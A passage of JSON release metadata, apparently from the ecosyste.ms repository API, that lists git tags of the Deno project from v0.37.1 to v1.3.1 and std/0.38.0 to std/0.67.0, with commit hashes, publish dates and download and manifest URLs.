0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api